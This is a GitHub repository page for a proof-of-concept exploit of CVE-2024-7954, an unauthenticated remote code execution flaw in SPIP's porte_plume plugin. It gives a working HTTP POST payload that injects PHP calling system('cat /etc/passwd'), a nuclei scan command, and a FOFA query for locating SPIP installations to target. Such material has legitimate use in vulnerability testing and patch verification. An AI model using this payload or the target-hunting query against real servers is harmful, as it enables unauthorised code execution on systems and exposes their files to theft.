Skip to content

Unauthenticated Remote Code Execution in SPIP versions up to and including 4.2.12

Notifications You must be signed in to change notification settings

gh-ost00/CVE-2024-7954-RCE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

Description

The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.

Exploit (Proof of concept)

POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB

Usage

nuclei --target {host.com} -t CVE-2024-7954.yaml

FOFA query

app="SPIP"

Reference

About

Unauthenticated Remote Code Execution in SPIP versions up to and including 4.2.12

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published